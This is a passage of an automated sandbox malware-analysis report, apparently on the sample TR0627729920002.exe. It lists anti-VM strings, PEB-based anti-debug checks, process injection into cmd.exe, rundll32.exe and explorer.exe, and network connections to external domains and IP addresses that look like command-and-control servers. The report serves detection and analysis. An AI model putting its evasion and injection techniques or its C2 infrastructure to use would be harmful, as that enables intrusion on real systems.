            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
            Source: Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
            Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.389287152.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
            Source: C:\Windows\SysWOW64\cmd.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C8D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C04BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C03B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C64257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C8B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C14A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C641E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C061A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C569A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C53884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C190AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C92073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C57016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C137F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C57794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BFF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C6FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C18EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C036CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C016E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C546A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C08E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C88DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BED5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BED5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C035A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C13D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C53540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C5A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C914FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A50 NtCreateFile,LdrInitializeThunk,

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\explorer.exe | File created: IconCachet0hh.exe.7.dr
            Source: C:\Windows\explorer.exe | Domain query: www.gografic.com
            Source: C:\Windows\explorer.exe | Network Connect: 154.55.180.56 80
            Source: C:\Windows\explorer.exe | Domain query: www.moneytaoism.com
            Source: C:\Windows\explorer.exe | Domain query: www.naturathome.info
            Source: C:\Windows\explorer.exe | Domain query: www.6111.site
            Source: C:\Windows\explorer.exe | Network Connect: 5.183.8.187 80
            Source: C:\Windows\explorer.exe | Network Connect: 38.54.163.57 80
            Source: C:\Windows\explorer.exe | Domain query: www.kidsfundoor.com
            Source: C:\Windows\explorer.exe | Domain query: www.choonchain.com
            Source: C:\Windows\explorer.exe | Domain query: www.empireapothecary.com
            Source: C:\Windows\explorer.exe | Domain query: www.huangse5.com
            Source: C:\Windows\explorer.exe | Domain query: www.nutricognition.com
            Source: C:\Windows\explorer.exe | Network Connect: 209.17.116.163 80
            Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.218 80
            Source: C:\Windows\explorer.exe | Network Connect: 81.169.145.158 80
            Source: C:\Windows\explorer.exe | Domain query: www.trisuaka.xyz
            Source: C:\Windows\explorer.exe | Domain query: www.trendiddas.com
            Source: C:\Windows\explorer.exe | Domain query: www.nomaxdic.com
            Source: C:\Windows\explorer.exe | Network Connect: 188.114.97.3 80
            Source: C:\Windows\explorer.exe | Network Connect: 156.226.60.131 80
            Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exe | Domain query: www.designgamagazine.com
            Source: C:\Windows\explorer.exe | Domain query: www.shopwithtrooperdavecom.com
            Source: C:\Windows\explorer.exe | Network Connect: 2.57.90.16 80
            Source: C:\Windows\SysWOW64\cmd.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1080000
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\TR0627729920002.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 50410000
            Source: C:\Users\user\Desktop\TR0627729920002.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 3430000
            Source: C:\Users\user\Desktop\TR0627729920002.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 3440000
            Source: C:\Users\user\Desktop\TR0627729920002.exe | Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 50410000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\TR0627729920002.exe | Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3430000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\TR0627729920002.exe | Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3440000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\TR0627729920002.exe | Memory written: C:\Windows\SysWOW64\cmd.exe base: 50410000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\cmd.exe | Thread APC queued: target process: C:\Windows\explorer.exe
            Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 3968
            Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 3968
